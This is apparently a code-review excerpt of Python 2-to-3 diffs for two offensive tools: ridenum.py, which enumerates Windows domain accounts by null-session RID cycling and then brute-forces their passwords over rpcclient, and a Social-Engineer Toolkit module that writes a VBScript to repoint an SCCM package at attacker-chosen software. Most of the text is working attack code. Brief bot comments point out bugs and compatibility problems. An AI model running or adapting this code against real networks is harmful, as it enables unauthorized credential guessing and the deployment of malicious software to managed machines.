if "NT_STATUS_NONE_MAPPED" or "NT_STATUS_CONNECTION_REFUSED" or "NT_STATUS_ACCESS_DENIED" in stdout_value:
return False
else:
return stdout_value
# helper function to break a list up into smaller lists
def chunk(l, n):
for i in range(0, len(l), n):
yield l[i:i + n]
# this will do a conversion to find the account name based on rid
# looks up multiple sid-rids at a time provided a range
def sids_to_names(ip, sid, start, stop):
rid_accounts = []
ranges = ['%s-%s' % (sid, rid) for rid in range(start, stop)]
# different chunk size for darwin (os x)
chunk_size = 2500
if sys.platform == 'darwin':
chunk_size = 5000
chunks = list(chunk(ranges, chunk_size))
for c in chunks:
command = 'rpcclient -U "" %s -N -c "lookupsids ' % ip
command += ' '.join(c)
command += '"'
proc = subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, shell=True)
stdout_value = proc.communicate()[0]
if "NT_STATUS_ACCESS_DENIED" in stdout_value:
print("[!] Server sent NT_STATUS_ACCESS DENIED, unable to extract users.")
global denied
denied = 1
break
for line in stdout_value.rstrip().split('\n'):
if not "*unknown*" in line:
if line != "":
rid_account = line.split(" ", 1)[1]
# will show during an unhandled request
# '00000' are bogus accounts?
# only return accounts ie. (1). Everything else should be a
# group
if rid_account != "request" and '00000' not in rid_account and '(1)' in rid_account:
# here we join based on spaces, for example 'Domain
# Admins' needs to be joined
rid_account = rid_account.replace("(1)", "")
# return the full domain\username
rid_account = rid_account.rstrip()
rid_accounts.append(rid_account)
return rid_accounts
# capture initial input
success = False
try:
if len(sys.argv) < 4:
usage()
ip = sys.argv[1]
rid_start = sys.argv[2]
rid_stop = sys.argv[3]
# if password file was specified
passwords = ""
# if we use userlist
userlist = ""
if len(sys.argv) > 4:
# pull in password file
passwords = sys.argv[4]
# if its not there then bomb out
if not os.path.isfile(passwords):
print("[!] File was not found. Please try a path again.")
sys.exit()
if len(sys.argv) > 5:
userlist = sys.argv[5]
if not os.path.isfile(userlist):
print("[!] File was not found. Please try a path again.")
sys.exit()
# check for python pexpect
try:
import pexpect
# if we don't have it
except ImportError:
print("[!] Sorry boss, python-pexpect is not installed. You need to install this first.")
sys.exit()
# if userlist is being used versus rid enum, then skip all of this
if not userlist:
print("[*] Attempting lsaquery first...This will enumerate the base domain SID")
# call the check_user_lsa function and check to see if we can find base
# SID guid
sid = check_user_lsa(ip)
# if lsa enumeration was successful then don't do
if sid:
sid = sid.replace(
"WARNING: Ignoring invalid value 'share' for parameter 'security'", "")
print("[*] Successfully enumerated base domain SID. Printing information: \n" + sid.rstrip())
print("[*] Moving on to extract via RID cycling attack.. ")
# format it properly
sid = sid.rstrip()
sid = sid.split(" ")
sid = sid[4]
# if we weren't successful on lsaquery
else:
print("[!] Unable to enumerate through lsaquery, trying default account names..")
accounts = ("administrator", "guest", "krbtgt", "root")
for account in accounts:
# check the user account based on tuple
sid = check_user(ip, account)
# if its false then cycle threw
if not sid:
print("[!] Failed using account name: %s...Attempting another." % account)
else:
# success! Break out of the loop
print("[*] Successfully enumerated SID account.. Moving on to extract via RID.\n")
break
# if we found one
if sid != False:
# pulling the exact domain SID out
sid = sid.split(" ")
# pull first in tuple
sid = sid[1]
# remove the RID number
sid = sid[:-4]
# we has no sids :( exiting
if sid == False:
denied = 1
print("[!] Failed to enumerate SIDs, pushing on to another method.")
print("[*] Enumerating user accounts.. This could take a little while.")
# assign rid start and stop as integers
rid_start = int(rid_start)
rid_stop = int(rid_stop)
# this is where we write out our output
if os.path.isfile("%s_users.txt" % ip):
# remove old file
os.remove("%s_users.txt" % ip)
filewrite = open("%s_users.txt" % ip, "a")
# cycle through rid and enumerate the domain
sid_names = sids_to_names(ip, sid, rid_start, rid_stop)
if sid_names:
for name in sid_names:
# print the sid
print("Account name: " + name)
# write the file out
filewrite.write(name + "\n")
# close the file
filewrite.close()
if denied == 0:
print("[*] RID_ENUM has finished enumerating user accounts...")
# if we failed all other methods, we'll move to enumdomusers
if denied == 1:
print("[*] Attempting enumdomusers to enumerate users...")
proc = subprocess.Popen("rpcclient -U '' -N %s -c 'enumdomusers'" %
(ip), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
filewrite = open("%s_users.txt" % ip, "a")
counter = 0
for line in iter(proc.stdout.readline, ''):
counter = 1
if line != '':
if "user:" in line:
# cycle through
line = line.split("rid:")
line = line[0].replace("user:[", "").replace("]", "")
print(line)
filewrite.write(line + "\n")
else:
denied = 2
break
else:
if counter == 0:
break
# if we had nothing to pull
if counter == 0:
denied = 2
if denied == 2:
print("[!] Sorry. RID_ENUM failed to successfully enumerate users. Bummers.")
if denied == 1:
filewrite.close()
print("[*] Finished dumping users, saved to %s_users.txt." % (ip))
# if we specified a password list
if passwords:
# our password file
passfile = open(passwords, "r").readlines()
userfile = ""
# if userlist was specified
if userlist:
# use the userlist specified
userfile = open(userlist, "r").readlines()
# our list of users
else:
userfile = open("%s_users.txt" % ip, "r").readlines()
# cycle through username first
for user in userfile:
filewrite = open("%s_success_results.txt" % ip, "a")
user = user.rstrip()
user_fixed = user.replace("\\", "\\\\").replace("'", "")
# if the user isn't blank
if user:
for password in passfile:
password = password.rstrip()
# if we specify a lowercase username
if password == "lc username":
try:
if "\\" in password:
password = user.split("\\")[1]
password = password.lower()
# if domain isn't specified
else:
password = user.lower()
except:
pass
# if we specify a uppercase username
if password == "uc username":
try:
if "\\" in password:
password = user.split("\\")[1]
password = password.upper()
else:
password = user.lower()
except:
pass
if password != "":
child = pexpect.spawn(
"rpcclient -U '%s%%%s' %s" % (user_fixed, password, ip))
# if we are using a blank password
if password == "":
child = pexpect.spawn(
"rpcclient -U '%s' -N %s" % (user_fixed, ip))
i = child.expect(['LOGON_FAILURE', 'rpcclient', 'NT_STATUS_ACCOUNT_EXPIRED',
'NT_STATUS_ACCOUNT_LOCKED_OUT', 'NT_STATUS_PASSWORD_MUST_CHANGE', 'NT_STATUS_ACCOUNT_DISABLED', 'NT_STATUS_LOGON_TYPE_NOT_GRANTED', 'NT_STATUS_BAD_NETWORK_NAME', 'NT_STATUS_CONNECTION_REFUSED', 'NT_STATUS_PASSWORD_EXPIRED', 'NT_STATUS_NETWORK_UNREACHABLE'])
# login failed for this one
if i == 0:
if "\\" in password:
password = password.split("\\")[1]
print("Failed guessing username of %s and password of %s" % (user, password))
child.kill(0)
# if successful
if i == 1:
print("[*] Successfully guessed username: %s with password of: %s" % (user, password))
filewrite.write(
"username: %s password: %s\n" % (user, password))
success = True
filewrite.close()
child.kill(0)
# if account expired
if i == 2:
print("[-] Successfully guessed username: %s with password of: %s however, it is set to expired." % (user, password))
filewrite.write(
"username: %s password: %s\n" % (user, password))
filewrite.close()
success = True
child.kill(0)
# if account is locked out
if i == 3:
print("[!] Careful. Received a NT_STATUS_ACCOUNT_LOCKED_OUT was detected.. \
You may be locking accounts out!")
child.kill(0)
# if account change is needed
if i == 4:
print("[*] Successfully guessed password but needs changed. Username: %s with password of: %s" % (user, password))
filewrite.write(
"CHANGE PASSWORD NEEDED - username: %s password: %s\n" % (user, password))
filewrite.close()
success = True
child.kill(0)
# if account is disabled
if i == 5:
print("[*] Account is disabled: %s with password of: %s" % (user, password))
filewrite.write(
"ACCOUNT DISABLED: %s PW: %s\n" % (user, password))
success = True
child.kill(0)
if i == 8 or i == 9:
print("[!] Unable to connect to the server. Try again or check networking settings.")
print("[!] Exiting RIDENUM...")
success = False
sys.exit()
# if successful
if i == 9:
print("[*] Successfully guessed username: %s with password of (NOTE IT IS EXPIRED!): %s" % (user, password))
filewrite.write(
"username: %s password: %s (password expired)\n" % (user, password))
filewrite.close()
success = True
child.kill(0)
filewrite.close()
# if we got lucky
if success:
print("[*] We got some accounts, exported results to %s_success_results_txt" % ip)
print("[*] All accounts extracted via RID cycling have been exported to %s_users.txt" % ip)
# if we weren't successful
else:
print("\n[!] Unable to brute force a user account, sorry boss.")
# exit out after we are finished
sys.exit()
# except keyboard interrupt
except KeyboardInterrupt:
print("[*] Okay, Okay... Exiting... Thanks for using rid_enum.py")


@ -1,7 +1,18 @@
#!/usr/bin/python
import subprocess
# coding=utf-8
import os
import subprocess
import sys
# check for python pexpect
try:
import pexpect
# if we don't have it
except ImportError:
print("[!] Sorry boss, python-pexpect is not installed. You need to install this first.")
sys.exit()
#############################################################################################################
#
# RID Enum
@ -21,7 +32,7 @@ import sys
def usage():
print """
print("""
.______ __ _______ _______ .__ __. __ __ .___ ___.
| _ \ | | | \ | ____|| \ | | | | | | | \/ |
| |_) | | | | .--. | | |__ | \| | | | | | | \ / |
@ -41,23 +52,24 @@ automatically attempt to brute force the user accounts when its finished enumera
- RID_ENUM is open source and uses all standard python libraries minus python-pexpect. -
You can also specify an already dumped username file, it needs to be in the DOMAINNAME\USERNAME
You can also specify an already dumped username file, it needs to be in the DOMAINNAME\\USERNAME
format.
Example: ./ridenum.py 192.168.1.50 500 50000 /root/dict.txt
Usage: ./ridenum.py <server_ip> <start_rid> <end_rid> <optional_password_file> <optional_username_filename>
"""
""")
sys.exit()
# for nt-status-denied
denied = 0
# attempt to use lsa query first
def check_user_lsa(ip):
# pull the domain via lsaenum
proc = subprocess.Popen('rpcclient -U "" %s -N -c "lsaquery"' % ip, stdout=subprocess.PIPE,
shell=True)
proc = subprocess.Popen('rpcclient -U "" {0} -N -c "lsaquery"'.format(ip), stdout=subprocess.PIPE, shell=True)
stdout_value = proc.communicate()[0]
# if the user wasn't found, return a False
if not "Domain Sid" in stdout_value:
@ -65,13 +77,18 @@ def check_user_lsa(ip):
else:
return stdout_value
# attempt to lookup an account via rpcclient
def check_user(ip, account):
proc = subprocess.Popen('rpcclient -U "" %s -N -c "lookupnames %s"' % (ip, account), stdout=subprocess.PIPE,
stderr=subprocess.PIPE, shell=True)
proc = subprocess.Popen('rpcclient -U "" {0} -N -c "lookupnames {1}"'.format(ip, account),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True)
stdout_value = proc.communicate()[0]
# if the user wasn't found, return a False
if "NT_STATUS_NONE_MAPPED" or "NT_STATUS_CONNECTION_REFUSED" or "NT_STATUS_ACCESS_DENIED" in stdout_value:
bad_statuses = ["NT_STATUS_NONE_MAPPED", "NT_STATUS_CONNECTION_REFUSED", "NT_STATUS_ACCESS_DENIED"]
if any(x in stdout_value for x in bad_statuses):
return False
else:
return stdout_value
@ -80,34 +97,34 @@ def check_user(ip, account):
# helper function to break a list up into smaller lists
def chunk(l, n):
for i in range(0, len(l), n):
yield l[i:i+n]
yield l[i:i + n]
# this will do a conversion to find the account name based on rid
# looks up multiple sid-rids at a time provided a range
def sids_to_names(ip, sid, start, stop):
rid_accounts = []
ranges = ['%s-%s' % (sid, rid) for rid in range(start, stop)]
ranges = ['{0}-{1}'.format(sid, rid) for rid in range(start, stop)]
# different chunk size for darwin (os x)
chunk_size = 2500
if sys.platform == 'darwin':
chunk_size = 5000
chunks = list(chunk(ranges, chunk_size))
for c in chunks:
command = 'rpcclient -U "" %s -N -c "lookupsids ' % ip
command = 'rpcclient -U "" {0} -N -c "lookupsids '.format(ip)
command += ' '.join(c)
command += '"'
proc = subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, shell=True)
stdout_value = proc.communicate()[0]
if "NT_STATUS_ACCESS_DENIED" in stdout_value:
print "[!] Server sent NT_STATUS_ACCESS DENIED, unable to extract users."
print("[!] Server sent NT_STATUS_ACCESS DENIED, unable to extract users.")
global denied
denied = 1
break
for line in stdout_value.rstrip().split('\n'):
if not "*unknown*" in line:
if "*unknown*" not in line:
if line != "":
rid_account = line.split(" ", 1)[1]
# will show during an unhandled request
@ -121,8 +138,10 @@ def sids_to_names(ip, sid, start, stop):
rid_accounts.append(rid_account)
return rid_accounts
# capture initial input
success = False
sid = None
try:
if len(sys.argv) < 4:
usage()
@ -138,92 +157,81 @@ try:
passwords = sys.argv[4]
# if its not there then bomb out
if not os.path.isfile(passwords):
print "[!] File was not found. Please try a path again."
print("[!] File was not found. Please try a path again.")
sys.exit()
if len(sys.argv) > 5:
userlist = sys.argv[5]
if not os.path.isfile(userlist):
print "[!] File was not found. Please try a path again."
print("[!] File was not found. Please try a path again.")
sys.exit()
# check for python pexpect
try:
import pexpect
# if we don't have it
except ImportError:
print "[!] Sorry boss, python-pexpect is not installed. You need to install this first."
sys.exit()
# if userlist is being used versus rid enum, then skip all of this
if not userlist:
print "[*] Attempting lsaquery first...This will enumerate the base domain SID"
print("[*] Attempting lsaquery first...This will enumerate the base domain SID")
# call the check_user_lsa function and check to see if we can find base SID guid
sid = check_user_lsa(ip)
# if lsa enumeration was successful then don't do
if sid:
sid = sid.replace("WARNING: Ignoring invalid value 'share' for parameter 'security'", "")
print "[*] Successfully enumerated base domain SID. Printing information: \n" + sid.rstrip()
print "[*] Moving on to extract via RID cycling attack.. "
# format it properly
sid = sid.replace("WARNING: Ignoring invalid value 'share' for parameter 'security'", "")
print("[*] Successfully enumerated base domain SID. Printing information: \n" + sid.rstrip())
print("[*] Moving on to extract via RID cycling attack.. ") # format it properly
sid = sid.rstrip()
sid = sid.split(" ")
sid = sid[4]
# if we weren't successful on lsaquery
# if we weren't successful on lsaquery
else:
print("[!] Unable to enumerate through lsaquery, trying default account names..")
accounts = ("administrator", "guest", "krbtgt", "root")
for account in accounts:
# check the user account based on tuple
sid = check_user(ip, account)
# if its false then cycle threw
if not sid:
print("[!] Failed using account name: {0}...Attempting another.".format(account))
else:
# success! Break out of the loop
print("[*] Successfully enumerated SID account.. Moving on to extract via RID.\n")
break
# if we found one
if sid:
# pulling the exact domain SID out
sid = sid.split(" ")
# pull first in tuple
sid = sid[1]
# remove the RID number
sid = sid[:-4]
# we has no sids :( exiting
else:
print "[!] Unable to enumerate through lsaquery, trying default account names.."
accounts = ("administrator", "guest", "krbtgt", "root")
for account in accounts:
# check the user account based on tuple
sid = check_user(ip, account)
# if its false then cycle threw
if not sid:
print "[!] Failed using account name: %s...Attempting another." % account
else:
# success! Break out of the loop
print "[*] Successfully enumerated SID account.. Moving on to extract via RID.\n"
break
# if we found one
if sid != False:
# pulling the exact domain SID out
sid = sid.split(" ")
# pull first in tuple
sid = sid[1]
# remove the RID number
sid = sid[:-4]
# we has no sids :( exiting
if sid == False:
denied = 1
print "[!] Failed to enumerate SIDs, pushing on to another method."
denied = 1
print("[!] Failed to enumerate SIDs, pushing on to another method.")
print "[*] Enumerating user accounts.. This could take a little while."
# assign rid start and stop as integers
rid_start = int(rid_start)
rid_stop = int(rid_stop)
# this is where we write out our output
if os.path.isfile("%s_users.txt" % ip):
# remove old file
os.remove("%s_users.txt" % ip)
filewrite = file("%s_users.txt" % ip, "a")
print("[*] Enumerating user accounts.. This could take a little while.")
# assign rid start and stop as integers
rid_start = int(rid_start)
rid_stop = int(rid_stop)
# this is where we write out our output
if os.path.isfile("{0}_users.txt".format(ip)):
# remove old file
os.remove("{0}_users.txt".format(ip))
with open("{0}_users.txt".format(ip), "a") as filewrite:
# cycle through rid and enumerate the domain
sid_names = sids_to_names(ip, sid, rid_start, rid_stop)
if sid_names:
for name in sid_names:
# print the sid
print "Account name: " + name
print("Account name: {0}".format(name))
# write the file out
filewrite.write(name + "\n")
# close the file
filewrite.close()
if denied == 0:
print "[*] RID_ENUM has finished enumerating user accounts..."
# if we failed all other methods, we'll move to enumdomusers
if denied == 1:
print "[*] Attempting enumdomusers to enumerate users..."
proc = subprocess.Popen("rpcclient -U '' -N %s -c 'enumdomusers'" % (ip), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
filewrite = file("%s_users.txt" % ip, "a")
if denied == 0:
print("[*] RID_ENUM has finished enumerating user accounts...")
# if we failed all other methods, we'll move to enumdomusers
if denied == 1:
print("[*] Attempting enumdomusers to enumerate users...")
proc = subprocess.Popen("rpcclient -U '' -N {0} -c 'enumdomusers'".format(ip), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
with open("{0}_users.txt".format(ip), "a") as filewrite:
counter = 0
for line in iter(proc.stdout.readline, ''):
counter = 1
@ -232,7 +240,7 @@ try:
# cycle through
line = line.split("rid:")
line = line[0].replace("user:[", "").replace("]", "")
print line
print(line)
filewrite.write(line + "\n")
else:
denied = 2
@ -241,139 +249,136 @@ try:
if counter == 0:
break
# if we had nothing to pull
if counter == 0:
denied = 2
# if we had nothing to pull
if counter == 0:
denied = 2
if denied == 2:
print "[!] Sorry. RID_ENUM failed to successfully enumerate users. Bummers."
if denied == 2:
print("[!] Sorry. RID_ENUM failed to successfully enumerate users. Bummers.")
if denied == 1:
filewrite.close()
print "[*] Finished dumping users, saved to %s_users.txt." % (ip)
if denied == 1:
print("[*] Finished dumping users, saved to {0}_users.txt.".format(ip))
# if we specified a password list
if passwords:
# our password file
passfile = file(passwords, "r").readlines()
userfile = ""
# if userlist was specified
if userlist:
# use the userlist specified
userfile = file(userlist, "r").readlines()
# our list of users
else:
userfile = file("%s_users.txt" % ip, "r").readlines()
with open(passwords) as fileopen:
passfile = fileopen.readlines()
# if userlist was specified use the userlist specified
if not userlist:
# our list of users
userlist = "{0}_users.txt".format(ip)
with open(userlist) as fileopen:
userfile = fileopen.readlines()
# cycle through username first
for user in userfile:
filewrite = file("%s_success_results.txt" % ip, "a")
user = user.rstrip()
user_fixed = user.replace("\\", "\\\\").replace("'", "")
with open("{0}_success_results.txt".format(ip), "a") as filewrite:
user = user.rstrip()
user_fixed = user.replace("\\", "\\\\").replace("'", "")
# if the user isn't blank
if user:
for password in passfile:
password = password.rstrip()
# if we specify a lowercase username
if password == "lc username":
try:
# if the user isn't blank
if user:
for password in passfile:
password = password.rstrip()
# if we specify a lowercase username
if password == "lc username":
try:
if "\\" in password:
password = user.split("\\")[1]
password = password.lower()
# if domain isn't specified
else:
password = user.lower()
except:
pass
# if we specify a uppercase username
if password == "uc username":
try:
if "\\" in password:
password = user.split("\\")[1]
password = password.upper()
else:
password = user.lower()
except:
pass
if password != "":
child = pexpect.spawn("rpcclient -U '{0}%{1}' {2}".format(user_fixed, password, ip))
# if we are using a blank password
if password == "":
child = pexpect.spawn("rpcclient -U '{0}' -N {1}".format(user_fixed, ip))
i = child.expect(['LOGON_FAILURE', 'rpcclient', 'NT_STATUS_ACCOUNT_EXPIRED',
'NT_STATUS_ACCOUNT_LOCKED_OUT', 'NT_STATUS_PASSWORD_MUST_CHANGE',
'NT_STATUS_ACCOUNT_DISABLED', 'NT_STATUS_LOGON_TYPE_NOT_GRANTED',
'NT_STATUS_BAD_NETWORK_NAME', 'NT_STATUS_CONNECTION_REFUSED',
'NT_STATUS_PASSWORD_EXPIRED', 'NT_STATUS_NETWORK_UNREACHABLE'])
# login failed for this one
if i == 0:
if "\\" in password:
password = user.split("\\")[1]
password = password.lower()
# if domain isn't specified
else: password = user.lower()
except: pass
# if we specify a uppercase username
if password == "uc username":
try:
if "\\" in password:
password = user.split("\\")[1]
password = password.upper()
else: password = user.lower()
except: pass
if password != "":
child = pexpect.spawn("rpcclient -U '%s%%%s' %s" % (user_fixed, password, ip))
# if we are using a blank password
if password == "":
child = pexpect.spawn("rpcclient -U '%s' -N %s" % (user_fixed, ip))
password = password.split("\\")[1]
print("Failed guessing username of {0} and password of {1}".format(user, password))
child.kill(0)
i = child.expect(['LOGON_FAILURE', 'rpcclient', 'NT_STATUS_ACCOUNT_EXPIRED',
'NT_STATUS_ACCOUNT_LOCKED_OUT', 'NT_STATUS_PASSWORD_MUST_CHANGE', 'NT_STATUS_ACCOUNT_DISABLED', 'NT_STATUS_LOGON_TYPE_NOT_GRANTED', 'NT_STATUS_BAD_NETWORK_NAME', 'NT_STATUS_CONNECTION_REFUSED', 'NT_STATUS_PASSWORD_EXPIRED', 'NT_STATUS_NETWORK_UNREACHABLE'])
# if successful
if i == 1:
print("[*] Successfully guessed username: {0} with password of: {1}".format(user, password))
filewrite.write("username: {0} password: {1}\n".format(user, password))
success = True
child.kill(0)
# if account expired
if i == 2:
print("[-] Successfully guessed username: {0} with password of: {1} however, it is set to expired.".format(user, password))
filewrite.write("username: {0} password: {1}\n".format(user, password))
success = True
child.kill(0)
# login failed for this one
if i == 0:
if "\\" in password:
password = password.split("\\")[1]
print "Failed guessing username of %s and password of %s" % (user, password)
child.kill(0)
# if account is locked out
if i == 3:
print("[!] Careful. Received a NT_STATUS_ACCOUNT_LOCKED_OUT was detected.. \
You may be locking accounts out!")
child.kill(0)
# if successful
if i == 1:
print "[*] Successfully guessed username: %s with password of: %s" % (user, password)
filewrite.write("username: %s password: %s\n" % (user, password))
success = True
filewrite.close()
child.kill(0)
# if account change is needed
if i == 4:
print("[*] Successfully guessed password but needs changed. Username: {0} with password of: {1}".format(user, password))
filewrite.write("CHANGE PASSWORD NEEDED - username: {0} password: {1}\n".format(user, password))
success = True
child.kill(0)
# if account expired
if i == 2:
print "[-] Successfully guessed username: %s with password of: %s however, it is set to expired." % (user, password)
filewrite.write("username: %s password: %s\n" % (user, password))
filewrite.close()
success = True
child.kill(0)
# if account is disabled
if i == 5:
print("[*] Account is disabled: {0} with password of: {1}".format(user, password))
filewrite.write("ACCOUNT DISABLED: {0} PW: {1}\n".format(user, password))
success = True
child.kill(0)
# if account is locked out
if i == 3:
print "[!] Careful. Received a NT_STATUS_ACCOUNT_LOCKED_OUT was detected.. \
You may be locking accounts out!"
child.kill(0)
if i == 8 or i == 9:
print("[!] Unable to connect to the server. Try again or check networking settings.")
print("[!] Exiting RIDENUM...")
success = False
sys.exit()
# if account change is needed
if i == 4:
print "[*] Successfully guessed password but needs changed. Username: %s with password of: %s" % (user,password)
filewrite.write("CHANGE PASSWORD NEEDED - username: %s password: %s\n" % (user, password))
filewrite.close()
success = True
child.kill(0)
# if successful
if i == 9:
print("[*] Successfully guessed username: {0} with password of (NOTE IT IS EXPIRED!): {1}".format(user, password))
filewrite.write("username: {0} password: {1} (password expired)\n".format(user, password))
success = True
child.kill(0)
# if account is disabled
if i == 5:
print "[*] Account is disabled: %s with password of: %s" % (user, password)
filewrite.write("ACCOUNT DISABLED: %s PW: %s\n" % (user,password))
success = True
child.kill(0)
if i ==8 or i == 9:
print "[!] Unable to connect to the server. Try again or check networking settings."
print "[!] Exiting RIDENUM..."
success = False
sys.exit()
# if successful
if i == 9:
print "[*] Successfully guessed username: %s with password of (NOTE IT IS EXPIRED!): %s" % (user, password)
filewrite.write("username: %s password: %s (password expired)\n" % (user, password))
filewrite.close()
success = True
child.kill(0)
filewrite.close()
# if we got lucky
if success:
print "[*] We got some accounts, exported results to %s_success_results_txt" % ip
print "[*] All accounts extracted via RID cycling have been exported to %s_users.txt" % ip
print("[*] We got some accounts, exported results to {0}_success_results_txt".format(ip))
print("[*] All accounts extracted via RID cycling have been exported to {0}_users.txt".format(ip))
# if we weren't successful
else:
print "\n[!] Unable to brute force a user account, sorry boss."
print("\n[!] Unable to brute force a user account, sorry boss.")
# exit out after we are finished
sys.exit()
# except keyboard interrupt
# exit out after we are finished
sys.exit() # except keyboard interrupt
except KeyboardInterrupt:
print "[*] Okay, Okay... Exiting... Thanks for using ridenum.py"
print("[*] Okay, Okay... Exiting... Thanks for using ridenum.py")
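Review bot: The connection-failure branch `if i == 8 or i == 9:` uses the wrong indices into the expect list: index 9 is 'NT_STATUS_PASSWORD_EXPIRED' and index 10 is 'NT_STATUS_NETWORK_UNREACHABLE', so an expired-password response exits the tool through sys.exit() and the `if i == 9:` branch just below it is unreachable, while an unreachable network falls through silently; it should read `if i == 8 or i == 10:`. This carries over from the old side rather than being introduced here, but the commit touched these lines while converting them to `.format`. Given the Py2/3 intent of the change, note also that `stdout_value` from `proc.communicate()[0]` is bytes on Python 3, so `"Domain Sid" in stdout_value` in check_user_lsa raises TypeError, and `iter(proc.stdout.readline, '')` never reaches its str sentinel on a bytes stream; decoding once (`stdout_value = proc.communicate()[0].decode("utf-8", "replace")`) and using `b''` as the sentinel would fix both. The enclosing module-level try block starts after `sid = None` and ends at the KeyboardInterrupt handler, both within this section.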


@ -0,0 +1 @@
# coding=utf-8


@ -1,18 +1,33 @@
#!/usr/bin/python
from src.core.setcore import *
print("The" + bcolors.BOLD + " SCCM Attack Vector " + bcolors.ENDC + "will utilize the SCCM configurations to deploy malicious software. \n\nYou need to have the SMSServer name and a PackageID you want to package on the website. Then you need to copy this configuration file to the startup directory for all of the users on the server.")
# coding=utf-8
import os
import src.core.setcore as core
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
print("The" + core.bcolors.BOLD + " SCCM Attack Vector " + core.bcolors.ENDC +
"will utilize the SCCM configurations to deploy malicious software. \n\n"
"You need to have the SMSServer name and a PackageID you want to package "
"on the website. Then you need to copy this configuration file to the "
"startup directory for all of the users on the server.")
sms_server = input("Enter the IP address or hostname of the SMS Server: ")
package_id = input(
"Enter the Package ID of the package you want to patch: ")
package_id = input("Enter the Package ID of the package you want to patch: ")
configuration = '''
# configuration file written by Dave DeSimone and Bill Readshaw
# attack vector presented at Defcon 20
# added to set 07/27/2012
strSMSServer = "%s"
strPackageID = "%s"
strSMSServer = "{0}"
strPackageID = "{1}"
Set objLoc = CreateObject("WbemScripting.SWbemLocator")
Set objSMS= objLoc.ConnectServer(strSMSServer, "root\sms")
@ -30,15 +45,12 @@ Set objPkgs = objSMS2.ExecQuery("select * from SMS_Package where PackageID = '"
for each objPkg in objPkgs
objPkg.RefreshPkgSource(0)
Next
''' % (sms_server, package_id)
'''.format(sms_server, package_id)
# write out the file to reports
filewrite = open(setdir + "/reports/sccm_configuration.txt", "w")
filewrite.write(configuration)
filewrite.close()
print_status("The SCCM configuration script has been successfully created.")
print_status("You need to copy the script to the startup folder of the server.")
print_status(
"Report has been exported to %s/reports/sccm_configuration.txt" % (definepath))
pause = input("Press " + bcolors.RED +
"{return} " + bcolors.ENDC + "to exit this menu.")
with open(os.path.join(core.setdir, "reports/sccm_configuration.txt"), 'w') as filewrite:
filewrite.write(configuration)
core.print_status("The SCCM configuration script has been successfully created.")
core.print_status("You need to copy the script to the startup folder of the server.")
core.print_status("Report has been exported to {0}".format(os.path.join(core.definepath, "reports/sccm_configuration.txt")))
pause = input("Press " + core.bcolors.RED + "{return} " + core.bcolors.ENDC + "to exit this menu.")
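Review bot: The VBScript template is now rendered with `.format()`, so any literal `{` or `}` in the template body would raise a KeyError/ValueError at runtime instead of being written to the report; the middle of the template (old lines 19–29) lies outside these hunks, so please confirm it contains no braces that need doubling. The template also keeps `"root\sms"` inside a non-raw triple-quoted string, which only works because `\s` is not a recognised escape and emits a DeprecationWarning on newer interpreters; declaring it as `configuration = r'''` keeps the backslash literal and still allows `.format`. `sms_server` and `package_id` are interpolated unquoted into the generated script, so a stray `"` in the operator's input yields an invalid VBScript file; a one-line guard before rendering, `if '"' in sms_server + package_id: core.print_error("quotes are not allowed in the server name or package ID")`, would surface that early (hedged: print_error is assumed to exist in setcore alongside print_status).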